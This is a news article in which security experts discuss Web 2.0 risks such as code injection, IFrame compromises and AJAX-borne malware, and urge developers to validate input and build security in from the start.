Web 2.0: Unsafe At Any Speed?

Paul Ferguson, a network architect with antivirus vendor Trend Micro, summed up Web 2.0 as thus: “We’re basically training our online users to be exploited.”

He’s not the only security expert who feels this way. Researchers who live and breathe malware told InternetNews.com in multiple interviews that the very nature of Web 2.0 technology and how it is used begs for malicious software infection and is virtually impossible to secure.

The laundry list of complaints about Web 2.0 security can be boiled down to two distinct problems: not knowing all of your data sources, and having no control over what may be served up.

“Web 2.0 sites are defined by user collaboration and user input. So whenever you have input from a user that can show up on a Web page to other people, that creates a form of risk,” said Jon Orbeton, strategic product manager for IronPort, a developer of gateway filtering hardware.

Bob Buffone, chief architect with Nexaweb, a provider of Web 2.0-based applications for the enterprise, agrees. “From the end user’s perspective, this third party code inclusion – IFrame , widgets, AJAX  — really breaks the trust relationship with a Web site and end user,” he said. “The user comes to a site trusting that the site has done everything to secure their data. They don’t know what extends beyond that.”

End users can’t protect themselves because they can’t see from the Web page they are on from where all of this stuff is being pulled. A well-programmed site checks the integrity of the data taken from an outside source before it’s sent down to the user. Programmers call that process input validation.

If something from the outside is brought into an application, it needs to be scrubbed for dangerous code. But all too often, data and code are just grabbed from a variety of sources without the user really looking to see if it contains any malicious code. It’s even hard to trust trusted sites is not safe any more.

[cob:Related_Articles]

It’s the nature of the Web 2.0 beast to bring in data from other sources, which is what makes it fun and at the same time dangerous. “What makes it more dangerous is collaboration. There’s so much more data being exposed these days. With GeoCities a decade ago, it was pretty unscriptable. There wasn’t much the bad guys could do to harvest information and there was little people put out there,” said Randy Abrams, director of technical training for antivirus vendor ESET Software.

“GeoCities was like a bunch of apartments, whereas MySpace is like Time Square, except people are hanging up their dirty laundry and changing in public,” he added.

Fortunately, some of the Web 2.0 leaders are beginning to recognize this. When it launched a developer platform earlier this month, MySpace was quite careful to put in many of the security measures that security experts say are needed. This includes code scrubbing and means to prevent code injection.

Next page: Do they really code safely?

Page 2 of 2

One of the most common means of exploiting a Web 2.0 site is code injection. It’s highly preventable if developers validate all the input they get and insures it’s the type of content that should be allowed. But many developers don’t because they don’t know they need to in the first place, argues Mary Landesman, senior security researcher for ScanSafe, a security service provider.

“The boundaries between good site/bad site are dissolving due to cross site injection attacks,” she said. “People are not being infected because people go to bad sites, but more often that they visit a legit website and it has a code injection compromise, so the user is then subjected to content pulled from a malicious site.”

Will It Blend?

The problem then becomes securing this stuff, and that’s not easy. You can set up all the edge servers and firewalls you want, but when the browser opens up port 80 and lets in all that JavaScript code, you’ve just bypassed a lot of your security measures.

“AJAX is as safe as JavaScript and JavaScript itself is widely used to exploit the browsers,” said Yuval Ben-Itzhak, CTO of Finjan. “The risk in AJAX is after the page is loaded, it can access a remote server and download content to infect your machine. Traditional security will find it difficult to deal with AJAX requests as opposed to normal user requests.”

Even worse, Ben-Itzhak said it’s possible for a piece of malicious code to be broken up and sent down in segments within the AJAX code, bypassing signatures that look for the malware as a whole and not in parts.

The problem is that like so many Internet technologies, everyone was in such a rush to do something cool, they thought about security later. No one would dream of hosting a Web site in this day and age the way they were operated in 1996. Twelve years from now, we may have the same hindsight about Web 2.0. Security experts are saying wake up right now.

“It’s not unusual for new technologies to come out with security as an afterthought,” said Kevin Haley, director of product management for Symantec Security Response. “So I don’t think this should be totally unexpected. Security is an afterthought as the technology emerges. If it’s going to be viable they have to start looking at closing these holes.”

That means thinking like a bad guy. “First off, these developers have got to start thinking beyond how can I build something cool to how can I be a really bad person,” said Abrams. “Most programmers think ‘how do I make something work?’ The fundamental thought needs to be ‘how can what I’m making be abused,’ and start putting security in place.”

A Pain In The IFrame

One of the most common targets for exploit is IFrame, which is essentially for the Web what picture-in-picture is for your TV. It allows content from another site to be displayed seamlessly on a page. While convenient, it’s also been a repeated source of attack, and no wonder.

You think you’re going to a harmless page on a trusted site, but the IFrame has been pointed to a page with malicious code. Last summer, more than 10,000 sites were compromised and redirected visitors to sites with malicious code. Since most of the sites were in Italy, the hack was dubbed “The Italian Job,” in homage to the movie.

[cob:Related_Articles]

IFrame exploits are being reported almost weekly now. It’s left Dave Marcus, security research and communications manager for McAfee’s Avert Labs, reconsidering the value of IFrame. “Lately it seems to be more trouble than its worth,” he said. “I don’t think a lot of functionality would be lost of they significantly eliminated IFrames. They’re just more trouble than they are worth.”

[cob:In_Focus]

In the case of The Italian Job, 10,000 sites were affected by a single PHP script, all through one site. More than 80,000 people were affected in one short period of time. “You gotta wonder if it’s worth it,” said Marcus.

However, Window Snyder (yes, that’s her name), chief security something or other (yes, that’s her title) for the Mozilla Foundation defends IFrame as valuable and securable. “We’re doing all the things we can to make it as secure as possible, but security is difficult,” she admitted. “It’s going to be work. Security in Firefox 3 is going to include IFrame protection. Is it 100 percent effective? No, but nothing in security is.”

Snyder said there is some burden on developers, who need to implement threat modeling, penetration testing, source code review, and have a response plan in place for vulnerabilities.

Snyder sentiments echo that of others, that security can’t be an afterthought. “Just because a lot of features on the Internet were implemented without security doesn’t mean we shouldn’t use them. We should look for ways to do them securely. Every feature you develop, every control you write, you need to consider security. You can’t tack it on at the end,” she said.

Symantec’s Haley said that while nothing is 100 percent securable, he’s also not sure of the practicality of kicking IFrames from the browser. “It’s not so much IFrame, it’s the exploits that go through IFrame. IFrame maybe not be very secure in its current form but there are things that have got to be done to make it better, like now allowing things to be executed in IFrame.”

Shortening The Leash

So what’s the solution? The security pros say it’s time to reign in the nearly unrestrained freedom of a Web 2.0 environment regardless of the footstomping that occurs. What’s also needed is a little more granularity in the options for IT managers.

“The challenge for a lot of organizations is only having that binary decision of allowing or blocking it doesn’t work,” said Frank Cabri, vice president of product management for Facetime, a security provider and compliance firm.

“Anyone can block MySpace, but we try to take that a little further, and let them go to MySpace but don’t allow use of its instant messenger,” he added. “So you educate them and sanction only a few widgets. Some times there’s an uprising with employees, they feel they have a right to do this in the office. IT doesn’t see it that way. It’s not a free-for-all because we gave you a PC.”

Developers need to be educated on security, said Landesman. “I think that a concerted effort to raise the savviness of Web developers, raise the number of experienced Web developers, and introduce certifications that give some indication of that level of experience,” she said.

Input validation is a must, said Ben-Itzhak. “Web sites need to look at what the content is doing. If it’s trying to change computer settings or access the local disk, it’s enough to say it’s suspicious,” he said. “Before they publish content, MySpace can just scan it with technologies that understand what it will do. It might take a minute but at least you can make sure this content is legitimate rather than let’s give people whatever they want.”

Jon Orbeton of IronPort is also in agreement on this technique. “Sites need to insure they have good Web development and secure coding techniques. Input means scrubbing metacharacters by examining code as it comes in to see if it contains metacharacters to execute code on the user’s machine when they use it,” he said.

That’s already being done on some levels, said Buffone. “What a lot of people do now is instead of cross site scripting, they initiate the request, pull down the information, scrub the data, pare it down and send it to the app host. But it has to be done form the server, not from the client,” he said.

There also needs to be a reevaluation of widgets being used in applications, even when they are from a trusted source like Google, because those too can be compromised. “I wouldn’t even trust Google Maps with sensitive financial data,” he said. “It depends on the setting. Combined with Flickr pictures? What could someone do that? But mashing up Google Maps with proprietary or commercial information, like your revenue? I wouldn’t put Google Maps on that page.”

News Around the Web